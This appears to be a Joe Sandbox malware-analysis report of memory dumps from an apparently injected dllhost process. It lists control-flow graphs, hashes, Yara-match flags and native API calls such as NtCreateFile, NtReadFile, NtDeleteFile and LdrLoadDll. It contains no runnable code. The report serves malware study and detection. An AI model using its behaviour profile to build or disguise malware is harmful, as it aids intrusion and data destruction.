3852ee0 LdrInitializeThunk 81334->81338 81335 30a86b3 81338->81335 81339 30a5e70 81340 30a5eca 81339->81340 81342 30a5ed7 81340->81342 81343 30a38a0 81340->81343 81344 30a38e1 81343->81344 81345 3094350 LdrLoadDll 81344->81345 81347 30a39e0 81344->81347 81348 30a3921 81345->81348 81346 30a3962 Sleep 81346->81348 81347->81342 81348->81346 81348->81347 81349 30a90f0 81350 30a9167 81349->81350 81352 30a911b 81349->81352 81351 30a917d NtDeleteFile 81350->81351 81353 3092575 81354 3092595 81353->81354 81355 30960c0 2 API calls 81354->81355 81356 30925a0 81355->81356 81357 30985f7 81358 30985fa 81357->81358 81359 30985b1 81358->81359 81361 3096eb0 81358->81361 81362 3096ec6 81361->81362 81364 3096efc 81361->81364 81362->81364 81365 3096d20 LdrLoadDll 81362->81365 81364->81359 81365->81364 81366 30971b6 81367 3097169 81366->81367 81368 309717f 81367->81368 81369 309b050 9 API calls 81367->81369 81369->81368

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 3089a80-3089e89 1 3089e8b-3089e94 0->1 2 3089e96-3089e9c 0->2 3 3089ea2-3089f59 1->3 2->3 4 3089f6a-3089f76 3->4 5 3089f78-3089f8a 4->5 6 3089f8c-3089f96 4->6 5->4 8 3089fa7-3089fb3 6->8 9 3089fc9-3089fe1 8->9 10 3089fb5-3089fc7 8->10 12 3089ff2-3089ffb 9->12 10->8 13 3089ffd-308a010 12->13 14 308a012-308a01c 12->14 13->12 16 308a02d-308a039 14->16 17 308a04a-308a05b 16->17 18 308a03b-308a048 16->18 20 308a06c-308a075 17->20 18->16 21 308a08c-308a096 20->21 22 308a077-308a08a 20->22 24 308a098-308a0b7 21->24 25 308a0ca-308a0ce 21->25 22->20 28 308a0c8 24->28 29 308a0b9-308a0c2 24->29 26 308a0d0-308a0ef 25->26 27 308a0f1-308a0f8 25->27 26->25 30 308a0fa-308a12d 27->30 31 308a12f-308a138 27->31 28->21 29->28 30->27 32 308a13e-308a156 31->32 33 308a262-308a26c 31->33 34 308a158-308a162 32->34 35 308a19a-308a1a6 32->35 36 308a27d-308a287 33->36 37 308a173-308a17f 34->37 38 308a1a8-308a1c9 35->38 39 308a1cb-308a1d5 35->39 40 308a289-308a29c 36->40 41 308a29e-308a2a8 36->41 42 308a181-308a193 37->42 43 308a195 37->43 38->35 44 308a1e6-308a1f2 39->44 40->36 46 308a2b9-308a2c5 41->46 42->37 43->33 47 308a20a-308a214 44->47 48 308a1f4-308a1fd 44->48 49 308a2db-308a2e5 46->49 50 308a2c7-308a2d9 46->50 56 308a225-308a22e 47->56 52 308a208 48->52 53 308a1ff-308a202 48->53 55 308a2f6-308a2ff 49->55 50->46 52->44 53->52 58 308a301-308a313 55->58 59 308a315-308a31f 55->59 60 308a230-308a240 56->60 61 308a253-308a25d 56->61 58->55 63 308a330-308a33c 59->63 64 308a251 60->64 65 308a242-308a24b 60->65 61->31 66 308a33e-308a34a 63->66 67 308a366-308a370 63->67 64->56 65->64 69 308a34c-308a350 66->69 70 308a351-308a353 66->70 71 308a381-308a388 67->71 69->70 74 308a364 70->74 75 308a355-308a35e 70->75 72 308a38a-308a3af 71->72 73 308a3b1-308a3bb 71->73 72->71 77 308a3cc-308a3d8 73->77 74->63 75->74 79 308a3da-308a3e3 77->79 80 308a3f0-308a3fa 77->80 81 308a3ee 79->81 82 308a3e5-308a3e8 79->82 83 308a40b-308a417 80->83 81->77 82->81 85 308a428-308a432 83->85 86 308a419-308a426 83->86 88 308a443-308a44c 85->88 86->83 89 308a44e-308a457 88->89 90 308a464-308a46b 88->90 91 308a459-308a45c 89->91 92 308a462 89->92 93 308a4db-308a4e5 90->93 94 308a46d-308a477 90->94 91->92 92->88 96 308a488-308a491 94->96 97 308a493-308a4a5 96->97 98 308a4a7 call 30aaec0 96->98 99 308a479-308a482 97->99 101 308a4ac-308a4b3 98->101 99->96 101->93 102 308a4b5-308a4d9 101->102 102->101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #($)$*$/$8$8$;/$@$@1$C$F&$H$H|$J$L$Q$R$R#$V$W$^'$_b$`DG$`i$d$f$h$k$nP$p$r$wo$x$x/$xb$z${~$}$G
                                                      • API String ID: 0-3663850689
                                                      • Opcode ID: d6d95e09d5bd41f14ca4de47aad85ad6040659bb04ac4efcdf7698b10293968b
                                                      • Instruction ID: fbbd457716fddcba9cdbc4973a25cf1f7c9f19e97b20533e2a55f1ff6388bc5c
                                                      • Opcode Fuzzy Hash: d6d95e09d5bd41f14ca4de47aad85ad6040659bb04ac4efcdf7698b10293968b
                                                      • Instruction Fuzzy Hash: 1242B2B0E05228CBEB64DF44C8987DDBBB1BB55308F1085DAD5896B681CBB91EC9CF44
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0309C4A1
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0309C4DE
                                                      • FindClose.KERNELBASE(?), ref: 0309C4E9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: c299524d8a8c734a088444b1f9dd0e2dee75cc8518c1ba36179c7ecee28228c2
                                                      • Instruction ID: 195f50ae552369544f016eedb53f2c8726c8f1dd0026ec10120bac4f07f14bfb
                                                      • Opcode Fuzzy Hash: c299524d8a8c734a088444b1f9dd0e2dee75cc8518c1ba36179c7ecee28228c2
                                                      • Instruction Fuzzy Hash: 2D319675A01708BBEB20EFA4DC85FFF77BCAF84704F144459B505AB180D670AA858BA0
                                                      APIs
                                                      • NtCreateFile.NTDLL(AF327900,?,?,?,?,?,?,?,?,?,?), ref: 030A8F81
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 6545e4d82b21896a63a57516ce8203b8ea828a5fec6cbd61a77e9266046012fe
                                                      • Instruction ID: 123a6fd2106d1b116a12f1b51ae26eb376cafa5017051f8e5136dc31f3f303bc
                                                      • Opcode Fuzzy Hash: 6545e4d82b21896a63a57516ce8203b8ea828a5fec6cbd61a77e9266046012fe
                                                      • Instruction Fuzzy Hash: 0931D5B5A11608AFCB14DF99D840EEE77F9EF8C304F108219F919A7240D730A941CFA4
                                                      APIs
                                                      • NtReadFile.NTDLL(AF327900,?,?,?,?,?,?,?,?), ref: 030A90D9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 7f8b455a74720bc4e24500b5a66aab9c4f3e8e7541d6fe2aa51cd8b4b97b58c5
                                                      • Instruction ID: e8e60e1d96fee3603f546894585e36ecf95052f18a3ad76452c7405ec5bf322e
                                                      • Opcode Fuzzy Hash: 7f8b455a74720bc4e24500b5a66aab9c4f3e8e7541d6fe2aa51cd8b4b97b58c5
                                                      • Instruction Fuzzy Hash: 6B31D8B5A01608AFCB14DF98D880EEFB7B9EF88714F108219FD19A7240D770A951CFA4
                                                      APIs
                                                      • NtDeleteFile.NTDLL(AF327900), ref: 030A9186
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 117f58b596dbb2bd46260fd29b433081e817140f78a18ad25f976b0599fa9ffd
                                                      • Instruction ID: 6cf85e8a5c09e609fbac42e6da9322ec1456d417e5429a0f5222d38fab2588e8
                                                      • Opcode Fuzzy Hash: 117f58b596dbb2bd46260fd29b433081e817140f78a18ad25f976b0599fa9ffd
                                                      • Instruction Fuzzy Hash: D2115175A51A186FD620EBA9DC41FEF73ACDF85714F104209FA09AB181E7706901CBA5
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030A91C4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3080000_dllhost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: e08d3e2e3f9d23949a1a784393d26bd902ca173e8066a41c5b8cbd502fa07426
                                                      • Instruction ID: 12a1a8d7fc384094d28a2ae8e20abd8b76304f2b8a2a40399dfb0c36cd592970
                                                      • Opcode Fuzzy Hash: e08d3e2e3f9d23949a1a784393d26bd902ca173e8066a41c5b8cbd502fa07426
                                                      • Instruction Fuzzy Hash: 11E046362406247BD620EB5DDC41FDF77ACDFC6720F018025FA18AB281C6B0B90287A4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1fc85314d5d6a6a9823e2e17578dbdd8faf14c268a3d106fdceffd84a905eb79
                                                      • Instruction ID: 0e35be2d197d57f5d7772dcf9ed2deb12c408a3d3dac5e156efc031f387e2205
                                                      • Opcode Fuzzy Hash: 1fc85314d5d6a6a9823e2e17578dbdd8faf14c268a3d106fdceffd84a905eb79
                                                      • Instruction Fuzzy Hash: 67900271605804169140B1984C84646400597E0302B65C051E5468554C8B148A5A5362
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 09bf062549e407071dc6c993405424fb8970097344317f02b794c2c169053225
                                                      • Instruction ID: 7919a1ef0afd5d91987b6e8bb5a4990d4fabe10f8bb14ecd3245f8bbd98e34ec
                                                      • Opcode Fuzzy Hash: 09bf062549e407071dc6c993405424fb8970097344317f02b794c2c169053225
                                                      • Instruction Fuzzy Hash: C69002A1601504464140B1984C04506600597E13023A5C155A5598560C87188959926A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 18a9f97cbeb5c39aa6f7b5710c9148f8bc8e542af0a1f3690370b7eeebdf05a3
                                                      • Instruction ID: 7ab17cad6f65624b43eb08b03d587c4508d4f2f488cc167eda65a4beab0b5cd7
                                                      • Opcode Fuzzy Hash: 18a9f97cbeb5c39aa6f7b5710c9148f8bc8e542af0a1f3690370b7eeebdf05a3
                                                      • Instruction Fuzzy Hash: E690027160550806D100B1984914706100587D0202F75C451A5468568D87958A5565A3
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ac97e25cd62903a7c88ba65a446658aeb13748e010d2a26b421525d9a367b370
                                                      • Instruction ID: 4553d1a80a98db2c76da28bac4f11d7a15d52ac1c26e943882e404813eee1bab
                                                      • Opcode Fuzzy Hash: ac97e25cd62903a7c88ba65a446658aeb13748e010d2a26b421525d9a367b370
                                                      • Instruction Fuzzy Hash: 649002A1202404074105B1984814716400A87E0202B65C061E6058590DC62589956126
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5f39f6cc869d95d81b764bd8a1d96947094cf609706c9d4b6eb11937c6a61998
                                                      • Instruction ID: 4e38f0b170d05eb8e879bd42dbdf1cbe22269a3cd79b71cea3de90f6833f4c22
                                                      • Opcode Fuzzy Hash: 5f39f6cc869d95d81b764bd8a1d96947094cf609706c9d4b6eb11937c6a61998
                                                      • Instruction Fuzzy Hash: 66900265211404070105F5980B04607004687D5352365C061F6059550CD72189655122
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 03e6ee45568064831e1a3559f4829d9ba1feefde6be37749e784a6b5f6348eb9
                                                      • Instruction ID: 7494d9bd2fa5d5c4a7dbb6af2424ebcd89886718084832ecbb1db5c170af5a0c
                                                      • Opcode Fuzzy Hash: 03e6ee45568064831e1a3559f4829d9ba1feefde6be37749e784a6b5f6348eb9
                                                      • Instruction Fuzzy Hash: E7900265221404060145F5980A0460B044597D63523A5C055F645A590CC72189695322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a15bd527207def57e3f1dbb8fe5b62d5b94974de0b5bd03fc2114d3e2be862a1
                                                      • Instruction ID: 735270a135d49f7c038bb189ca631a9fbe175522dea680f0ff49f767a907383f
                                                      • Opcode Fuzzy Hash: a15bd527207def57e3f1dbb8fe5b62d5b94974de0b5bd03fc2114d3e2be862a1
                                                      • Instruction Fuzzy Hash: 0990026124545506D150B19C48047164005A7E0202F65C061A5858594D865589596222
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 955a16092d94a8ebf92a7c5fce75f69ec4315e579d5f442a51f258d74c24859a
                                                      • Instruction ID: 56938f24d00e55d2eb809ca07d550404f1b7014a6d59e3b8266df465b4f79a42
                                                      • Opcode Fuzzy Hash: 955a16092d94a8ebf92a7c5fce75f69ec4315e579d5f442a51f258d74c24859a
                                                      • Instruction Fuzzy Hash: B9900261601404464140B1A88C44A064005ABE1212765C161A59DC550D865989695666
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4d56bc6f78208602d55c45f9cb1873693c69d5dd663e53a073c66ddaa91d0218
                                                      • Instruction ID: cf9e264c88604cb05c4d8411d7c2338987a5e5756d47c84ed7505a59b42913f9
                                                      • Opcode Fuzzy Hash: 4d56bc6f78208602d55c45f9cb1873693c69d5dd663e53a073c66ddaa91d0218
                                                      • Instruction Fuzzy Hash: 52900261211C0446D200B5A84C14B07000587D0303F65C155A5198554CCA1589655522
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ab924305698def0fed0723e0d2fc0bf4fc3ff3ddd9fde5c9c52bbaf3461e0273
                                                      • Instruction ID: 6e936019a3e3cdfb2ca9538a3c6deda8fb409d8024080e705f9f2a57d69f9ba0
                                                      • Opcode Fuzzy Hash: ab924305698def0fed0723e0d2fc0bf4fc3ff3ddd9fde5c9c52bbaf3461e0273
                                                      • Instruction Fuzzy Hash: 0D9002A134140846D100B1984814B060005C7E1302F65C055E60A8554D8719CD566127
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 746a72471cb403b8db8a675b332cbc615e5d72cd5567e9a3b6b5afd75c43c9cb
                                                      • Instruction ID: 4a7f62ccb938ce4a421a48845c3e049aecc8aa7f83f712b5ea24311903f9e4e3
                                                      • Opcode Fuzzy Hash: 746a72471cb403b8db8a675b332cbc615e5d72cd5567e9a3b6b5afd75c43c9cb
                                                      • Instruction Fuzzy Hash: 7B9002A120180807D140B5984C04707000587D0303F65C051A70A8555E8B298D556136
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 652853052c4b62bbae638e0912c6c6dd24c9ffe9eec483547c405e3424e6219c
                                                      • Instruction ID: ae2e3b404ce00408107f9b8a21fb4e9e83bb6e8d0573ccc04214a353835166ec
                                                      • Opcode Fuzzy Hash: 652853052c4b62bbae638e0912c6c6dd24c9ffe9eec483547c405e3424e6219c
                                                      • Instruction Fuzzy Hash: 12900261242445565545F1984804607400697E02427A5C052A6458950C8626995AD622
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6064a0cea3b08c6b84ae3521a92dbb57e37134c7ba7f44a3be288b03663be352
                                                      • Instruction ID: 3f26fefff5aa2b015823f60a254a3569c4b4bc4525855e17df0a7a2b97390e20
                                                      • Opcode Fuzzy Hash: 6064a0cea3b08c6b84ae3521a92dbb57e37134c7ba7f44a3be288b03663be352
                                                      • Instruction Fuzzy Hash: E290027120140817D111B1984904707000987D0242FA5C452A5468558D97568A56A122
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8367813cd72ca08284f0b67ace3fec61bee528d0d8d5c64b8ec972fc42cf51ee
                                                      • Instruction ID: 485fdc472162666ee75f12e65b15cd82ff05120b216aaae350d681b036e24951
                                                      • Opcode Fuzzy Hash: 8367813cd72ca08284f0b67ace3fec61bee528d0d8d5c64b8ec972fc42cf51ee
                                                      • Instruction Fuzzy Hash: 6190026921340406D180B198580870A000587D1203FA5D455A5059558CCA15896D5322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9dcdaddd6642fce4b122b664aac5328b41ad89bace673c821b741212e0e84684
                                                      • Instruction ID: 9799c7ea5337b3f8f44b70bb96e0c42d53bdc57b1eda5c7e3ddf61368eafa56d
                                                      • Opcode Fuzzy Hash: 9dcdaddd6642fce4b122b664aac5328b41ad89bace673c821b741212e0e84684
                                                      • Instruction Fuzzy Hash: CA90026130140407D140B19858187064005D7E1302F65D051E5458554CDA15895A5223
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b0f7cb4a274c8236c2ecd26749985dc556de295692011bb4da3f9f159868892b
                                                      • Instruction ID: 9042c92cd25b81d7213d11a4801f3c243588a5e78ffd3bc44de2c974708445b1
                                                      • Opcode Fuzzy Hash: b0f7cb4a274c8236c2ecd26749985dc556de295692011bb4da3f9f159868892b
                                                      • Instruction Fuzzy Hash: 0690027120140806D100B5D85808746000587E0302F65D051AA068555EC76589956132
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
